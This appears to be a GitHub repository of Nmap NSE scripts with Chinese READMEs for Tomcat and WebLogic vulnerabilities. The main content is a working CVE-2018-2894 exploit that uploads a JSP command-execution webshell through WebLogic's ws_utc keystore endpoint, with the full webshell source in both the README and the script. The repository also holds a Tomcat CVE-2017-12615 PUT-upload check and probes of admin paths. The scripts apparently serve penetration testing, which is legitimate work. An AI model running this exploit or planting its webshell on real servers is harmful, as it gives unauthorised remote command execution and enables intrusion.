├── _config.yml ├── tomcat ├── README.md └── CVE-2017-12615 │ ├── README.md │ └── tomcat-cve-2017-12615.nse ├── weblogic ├── README.md ├── CVE-2018-2894 │ ├── README.md │ └── weblogic-cve-2018-2894.nse └── CNVD-C-2019-4814 │ └── weblogic-CNVD-C-2019-48814.nse ├── README.md └── http └── http-middleware-path-finder.nse /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-architect -------------------------------------------------------------------------------- /tomcat/README.md: -------------------------------------------------------------------------------- 1 | # Tomcat组件相关脚本 2 | 3 | * [CVE-2017-12615](https://github.com/Rvn0xsy/nse_vuln/tree/master/tomcat/CVE-2017-12615) 4 | 5 | -------------------------------------------------------------------------------- /weblogic/README.md: -------------------------------------------------------------------------------- 1 | # Weblogic 组件相关脚本 2 | 3 | * [CVE-2018-2894](https://github.com/Rvn0xsy/nse_vuln/tree/master/weblogic/CVE-2018-2894) 4 | * [CNVD-C-2019-4814](https://github.com/Rvn0xsy/nse_vuln/tree/master/weblogic/CNVD-C-2019-4814) -------------------------------------------------------------------------------- /tomcat/CVE-2017-12615/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-12615 2 | 3 | 攻击者可以利用这个漏洞,向目标服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险。 4 | 5 | ## Usage 6 | 7 | 该脚本会直接发送一个PUT请求向Web服务器写入一个文件 8 | 9 | nmap -Pn 172.19.0.2 -p 8080 --script=tomcat-cve-2017-12615 -n 10 | 11 | ## More 12 | 13 | nil. 
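--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# nse_vuln
Nmap扫描、漏洞利用脚本

## 参考学习

本来是想写成一本书的,但是可能断断续续没有很好的产出,我只能以文章的形式分享出来了,希望我的研究成果能够给大家带来便利。—— 作者:倾旋

PS :如果你不知道你是否需要学习这个技术,那么我可以先告诉你Nmap能够做什么:

* 网络结构画像
* 漏洞扫描
* 漏洞利用
* 端口扫描
* 爬虫
* 信息搜集
* ....

我的分类不是很清晰,但是对于一个渗透测试人员、运维人员、甲、乙方的工程师都会需要它的定制化功能。

例如:将扫描结果写到数据库?新的漏洞出了POC,客户需要立即进行漏洞扫描?

关于这些,我会慢慢更新....

* [Nmap扩展开发(一)](https://payloads.online/archivers/2019-04-24/1)
* [Nmap扩展开发(二)](https://payloads.online/archivers/2019-04-24/2)
* [Nmap扩展开发 (三) ](https://payloads.online/archivers/2019-04-24/3)
* [Nmap扩展开发(四)](https://payloads.online/archivers/2019-04-24/4)

我将会持续更新这些相关的文章 :)

## 感谢

如果你觉得这个项目不错,请给予一个star。

--------------------------------------------------------------------------------
/tomcat/CVE-2017-12615/tomcat-cve-2017-12615.nse:
--------------------------------------------------------------------------------
local stdnse = require "stdnse"
local http = require "http"

description = [[
Checks for CVE-2017-12615: an Apache Tomcat DefaultServlet that accepts HTTP
PUT of JSP files (readonly=false).

The script PUTs a small marker file to "/CVE-2017-12615-CHECK-<n>.jsp/" (the
trailing slash is what makes the PUT succeed on affected servers), fetches the
file back to confirm it is actually served, and then tries to DELETE it again.
A 201 on the PUT followed by the marker in the GET response means an attacker
can upload arbitrary JSP, i.e. remote code execution.

This check is intrusive: it writes into the target's webroot.  Cleanup is
best-effort and its outcome is reported; remove the file by hand when the
report says it could not be deleted.
]]

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}

-- Ports Tomcat is commonly bound to, kept as a set for an O(1) lookup; any
-- port that -sV fingerprinted as plain "http" is accepted as well.
local TOMCAT_PORTS = { [80] = true, [8080] = true, [8090] = true, [8899] = true }

portrule = function(host, port)
  return TOMCAT_PORTS[port.number] == true or port.service == "http"
end

-- Try to remove the marker file again.  The trailing-slash form is attempted
-- first (same routing as the PUT that created the file) and the plain path
-- second.  Returns true when either DELETE was answered with 200 or 204.
local function try_delete(host, port, path)
  for _, candidate in ipairs({ path .. "/", path }) do
    local rsp = http.generic_request(host, port, "DELETE", candidate)
    if rsp and (rsp.status == 200 or rsp.status == 204) then
      return true
    end
  end
  return false
end

action = function(host, port)
  local marker = "CVE-2017-12615"
  -- Random suffix so repeated scans do not collide with a leftover file.
  local shell_name = string.format("/%s-CHECK-%d.jsp", marker, math.random(9999))
  local out = stdnse.output_table()

  -- The trailing slash is the bypass: the request lands in the DefaultServlet,
  -- which (with readonly=false) stores the body under the name without it.
  local put_rsp = http.put(host, port, shell_name .. "/", nil, marker)
  if put_rsp and put_rsp.status == 201 then
    out.shell_name = shell_name

    -- Confirm the file is really served back, not merely acknowledged.
    local get_rsp = http.get(host, port, shell_name)
    local served = get_rsp and http.response_contains(get_rsp, "CVE%-2017%-12615")

    -- Best-effort cleanup: never knowingly leave an artefact in a writable webroot.
    if try_delete(host, port, shell_name) then
      out.cleanup = "test file deleted"
    else
      out.cleanup = "could NOT delete test file, remove " .. shell_name .. " manually"
    end

    if served then
      return out
    end
    return 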
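false
  end
  return false
end
postrule=function()
end
--------------------------------------------------------------------------------
/http/http-middleware-path-finder.nse:
--------------------------------------------------------------------------------
local http = require "http"
local shortport = require "shortport"
local string = require "string"
local stdnse = require "stdnse"


description = [[
Requests a fixed list of administrative and diagnostic paths that web
middleware commonly exposes (Tomcat manager, WebLogic console and async
service, JBoss consoles, phpMyAdmin, phpinfo, access logs, ...) and reports
every path whose status differs from the server's "not found" status.

The baseline is learned with http.identify_404 so that servers answering 200
for any path (soft 404) do not make every probe look like a hit; when no
baseline can be established the script reports nothing instead of everything.

A differing status only means the server treats the path specially.  It does
not prove the resource is readable without authentication (an auth-protected
console answering 401 is still reported), so each hit needs manual review.
]]

author = "Rvn0xsy@gmail.com"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE: "default" makes this run under -sC, which sends a dozen extra GETs to
-- every HTTP service; some engagements treat that as intrusive.
categories = {"default"}
blog = "https://payloads.online"
-- Precision mode
-- portrule = shortport.port_or_service( {80, 443, 8080, 7001}, {"http", "https"}, "tcp", "open")

portrule = shortport.service({"http","https"},"tcp","open")

-- Probed in this order; pipelined responses are matched back by index.
local request_paths = {
  "/phpinfo.php",
  "/manager/html",
  "/_async/AsyncResponseService",
  "/console/login/LoginForm.jsp",
  "/phpmyadmin/",
  "/web-console",
  "/jmx-console",
  "/host-manager",
  "/status",
  "/logs/access_log",
  "/jonasAdmin/",
  "/ibm/console/logon.jsp"
}

action = function(host, port)
  local out = stdnse.output_table()

  -- Learn what a non-existent path looks like on this server.  identify_404
  -- returns (false, <error string>) when it cannot tell; the original compared
  -- every status against that string and therefore flagged all twelve paths.
  local ok, not_found_status = http.identify_404(host, port)
  if not ok then
    stdnse.debug1("no 404 baseline for %s:%d (%s), skipping", host.ip, port.number, tostring(not_found_status))
    return nil
  end

  local queue = nil
  for _, path in ipairs(request_paths) do
    queue = http.pipeline_add(path, nil, queue, 'GET')
  end

  -- pipeline_go returns nil when the whole batch fails.
  local responses = http.pipeline_go(host, port, queue)
  if not responses then
    stdnse.debug1("pipelined requests to %s:%d failed", host.ip, port.number)
    return nil
  end

  local hits = 0
  for idx, response in ipairs(responses) do
    -- response.status is nil for an individual failed request; skip those.
    if response.status and response.status ~= not_found_status then
      hits = hits + 1
      out[request_paths[idx]] = string.format("status %d", response.status)
    end
  end

  if hits == 0 then
    return nil
  end
  return out
end
--------------------------------------------------------------------------------
/weblogic/CVE-2018-2894/README.md:
--------------------------------------------------------------------------------
# CVE-2018-2894


ws_utc 为 WebLogic Web 服务测试客户端,其配置页面存在未授权访问的问题,路径为 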
/ws_utc/config.do

攻击者通过访问此配置页面,先更改工作目录,用有效的 WebLogic Web 路径替换存储 JKS Keystores 的文件目录,然后在上传 JKS Keystores 时上传恶意的 JSP 脚本文件。访问最终的 JSP 文件路径地址,即可做到代码执行

安装方式:将weblogic-cve-2018-2894.nse放入nmap安装目录下的scripts目录中

说明:默认情况下会写入一个JSP执行命令的webshell:

```java
<%@ page import="java.io.*" %><%try {String cmd = request.getParameter("cmd");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>
```

注意:该默认文件是一个无需认证即可执行系统命令的后门,脚本不会自动删除它。授权测试时建议通过 `content` 参数写入无害的标记内容,并在测试结束后手动删除上传的文件。

你可以通过`--script-args`来指定文件名、URI路径和文件内容

## Usage

```
root@kali:~# nmap -Pn 172.19.0.2 -p 7001 --script=weblogic-cve-2018-2894 -n
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-23 02:26 EDT
Nmap scan report for 172.19.0.2
Host is up (0.000055s latency).

PORT STATE SERVICE
7001/tcp open afs3-callback
| weblogic-cve-2018-2894:
|_ url: /ws_utc/config/keystore/1532327177_test.jsp
MAC Address: 02:42:AC:13:00:02 (Unknown)
```

## More

* -- @args weblogic-cve-2018-2894.uri base path under which the ws_utc application is deployed, must end with '/' (e.g. '/' or '/weblogic/'). 
Default / 36 | * -- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded 37 | * -- @args weblogic-cve-2018-2894.content file's contents 38 | * -- Other useful arguments when using this script are: 39 | * -- * http.useragent = String - User Agent used in HTTP requests 40 | 41 | 42 | -------------------------------------------------------------------------------- /weblogic/CNVD-C-2019-4814/weblogic-CNVD-C-2019-48814.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local stdnse = require "stdnse" 4 | local vulns = require "vulns" 5 | description = [[ 6 | Weblogic CNVD-C-2019-48814 7 | ]] 8 | --- 9 | -- @usage 10 | -- nmap -sV --script weblogic-CNVD-C-2019-48814 -p 7001 11 | -- nmap -sV --script weblogic-CNVD-C-2019-48814 12 | -- 13 | -- @output 14 | -- PORT STATE SERVICE 15 | -- 7001/tcp open afs3-callback 16 | -- | weblogic-CNVD-C-2019-48814: 17 | -- | VULNERABLE: 18 | -- | Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability 19 | -- | State: VULNERABLE 20 | -- | IDs: 1:CNVD-C-2019-48814 CVE:CVE-2019-???? 21 | -- | Risk factor: High CVSSv3: ??? 22 | -- | 23 | -- | Disclosure date: 2019-04-17 24 | -- | References: 25 | -- | http://www.cnvd.org.cn/webinfo/show/4989 26 | -- | http://www.cnvd.org.cn/webinfo/show/4999 27 | -- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-???? 
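author = "Rvn0xsy "
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln"}
blog = "https://payloads.online"

-- WebLogic's usual listeners (7001 plain, 7002 SSL) plus anything that -sV
-- fingerprinted as HTTP(S).  The previous rule returned true for every open
-- port, which sent HTTP requests to SSH, SMTP, ... on each scanned host.
portrule = function(host, port)
  if port.number == 7001 or port.number == 7002 then
    return true
  end
  return port.service == "http" or port.service == "https"
end

-- Endpoint of the wls9_async web service the vulnerability lives in.
local ASYNC_PATH = "/_async/AsyncResponseService"

action = function(host, port)
  local vuln_table = {
    title = "Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability",
    -- CVE-2019-2725 is the id Oracle assigned to CNVD-C-2019-48814 (verify
    -- against Oracle's April 2019 Security Alert).  A real id also lets the
    -- vulns library emit a working reference URL instead of "CVE-2019-????".
    IDS = {CVE = 'CVE-2019-2725', CNVD = 'CNVD-C-2019-48814'},
    risk_factor = "High",
    scores = {
      CVSSv3 = "9.8",
    },
    description = [[
The wls9_async component deserializes attacker-controlled XML in unauthenticated
SOAP requests to /_async/AsyncResponseService, leading to remote command
execution.  This script only checks that the component is deployed and accepts
a text/xml POST; it does not send a deserialization payload, so a positive
result means "exposed, unconfirmed", not "exploit verified".
]],
    references = {
      'http://www.cnvd.org.cn/webinfo/show/4989',
      'http://www.cnvd.org.cn/webinfo/show/4999',
    },
    dates = {
      disclosure = {year = '2019', month = '04', day = '17'},
    },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  vuln_table.state = vulns.STATE.NOT_VULN

  -- Step 1: is the async service deployed at all?
  local get_rsp = http.get(host, port, ASYNC_PATH)
  if not (get_rsp and get_rsp.status == 200 and get_rsp.body) then
    return vuln_report:make_output(vuln_table)
  end
  -- The original returned an ad-hoc {Vuln="False"} table here; report through
  -- the vulns library in every branch so the output shape stays consistent.
  if not string.find(get_rsp.body, "async") then
    return vuln_report:make_output(vuln_table)
  end

  -- Step 2: does it accept a SOAP-style POST?  NOTE(review): the body below
  -- carries no XML envelope (it looks stripped in this copy), so a 202 only
  -- shows the servlet accepts text/xml posts; a patched server may answer the
  -- same way.  Hence LIKELY_VULN rather than VULN.
  local options = { header = { ["Content-Type"] = 'text/xml' } }
  local payload = "\n\nxxxx\n\n\n\n\n\n\n\n\n\n\n\n"
  local post_rsp = http.post(host, port, ASYNC_PATH, options, nil, payload)
  if post_rsp and post_rsp.status == 202 then
    vuln_table.state = vulns.STATE.LIKELY_VULN
    vuln_table.check_results = string.format("GET %s -> 200, POST text/xml -> 202", ASYNC_PATH)
  end
  return vuln_report:make_output(vuln_table)
end

--------------------------------------------------------------------------------
/weblogic/CVE-2018-2894/weblogic-cve-2018-2894.nse:
--------------------------------------------------------------------------------
local http = require "http"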
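local nmap = require "nmap"
local stdnse = require "stdnse"
description = [[
Exploits CVE-2018-2894 in Oracle WebLogic's ws_utc web-service test client.
The keystore upload endpoint (/ws_utc/resources/setting/keystore) is reachable
without authentication and stores the uploaded file as
/ws_utc/config/keystore/<timestamp>_<filename>, so a JSP can be uploaded and
then requested to execute code.

WARNING: the default payload is an unauthenticated command-execution webshell
and the script never removes it.  On an engagement pass a harmless marker via
the "content" argument and delete the uploaded file afterwards.
]]
---
-- @usage
-- nmap -sV --script weblogic-cve-2018-2894 -p 7001
-- nmap -sV --script weblogic-cve-2018-2894
--   --script-args 'weblogic-cve-2018-2894.uri=/,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' -p 7001
--
-- @output
-- PORT     STATE SERVICE
-- 7001/tcp open  afs3-callback
-- | weblogic-cve-2018-2894:
-- |_  url: /ws_utc/config/keystore/1532325925_Nmap.jsp
-- MAC Address: 02:42:AC:13:00:02 (Unknown)
--
--
-- @args weblogic-cve-2018-2894.uri      base path under which ws_utc is deployed,
--                                       e.g. "/" or "/weblogic/". Default "/"
-- @args weblogic-cve-2018-2894.filename name of the file to upload. Default "test.jsp"
-- @args weblogic-cve-2018-2894.content  contents of the uploaded file. Default: the
--                                       command-execution JSP defined below
-- Other useful arguments when using this script are:
-- * http.useragent = String - User Agent used in HTTP requests

author = "Rvn0xsy "
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit"}

-- Default upload: a one-line JSP that runs whatever the "cmd" parameter says.
local DEFAULT_CONTENT = "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>"

-- ws_utc ships with the administration console, which is why only the admin
-- listener is probed; use -p with another port if yours differs.
portrule = function(host, port)
  return port.number == 7001
end

-- Encode the text fields of the multipart body.  Every field is closed with a
-- boundary line so that the file part can be appended directly after it.
add_formData = function(form, boundary)
  local contents = "\r\n"
  for key, value in pairs(form) do
    contents = string.format("%sContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n", contents, key, value, boundary)
  end
  return contents
end

-- Encode the file part and the closing boundary.  The original omitted the
-- file body entirely (three %s for four values), so an empty file was stored.
add_fileData = function(file, boundary)
  return string.format("Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\nContent-Type: text/plain\r\n\r\n%s\r\n--%s--\r\n",
    file["name"], file["filename"], file["content"] or "", boundary)
end

action = function(host, port)
  local form = {
    ks_name = "Exploit CVE-2018-2894",
    ks_edit_mode = "false",
    ks_password_front = "123456",
    ks_password = "123456",
    ks_password_changed = "true",
  }
  local file = {
    name = "ks_filename",
    filename = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp",
    content = stdnse.get_script_args('weblogic-cve-2018-2894.content') or DEFAULT_CONTENT,
  }

  -- Bug fix: the original read the "filename" argument here, so "uri" was
  -- silently ignored and a custom filename became the request path prefix.
  local uri = stdnse.get_script_args('weblogic-cve-2018-2894.uri') or "/"
  if uri:sub(1, 1) ~= "/" then uri = "/" .. uri end
  if uri:sub(-1) ~= "/" then uri = uri .. "/" end

  -- One timestamp for both the query string and the reported path: the stored
  -- name is <timestamp>_<filename>, and two separate os.time() calls could
  -- straddle a second boundary and report a URL that does not exist.
  local timestamp = os.time()
  local stored_name = timestamp .. "_" .. file.filename
  local post_url = uri .. "ws_utc/resources/setting/keystore?timestamp=" .. timestamp

  local boundary = "-ABC"
  local body = "\r\n--" .. boundary .. add_formData(form, boundary) .. add_fileData(file, boundary)
  local options = {
    header = { ["Content-Type"] = "multipart/form-data; boundary=" .. boundary },
  }

  local resp = http.post(host, port, post_url, options, nil, body)
  if not (resp and resp.status == 200) then
    stdnse.debug1("keystore upload to %s returned status %s", post_url, tostring(resp and resp.status))
    return nil
  end

  -- The file is NOT fetched here on purpose: requesting it would execute the
  -- uploaded JSP.  Verify (and clean up) by hand using the reported URL.
  local out = stdnse.output_table()
  out.url = uri .. "ws_utc/config/keystore/" .. stored_name
  return out
end
--------------------------------------------------------------------------------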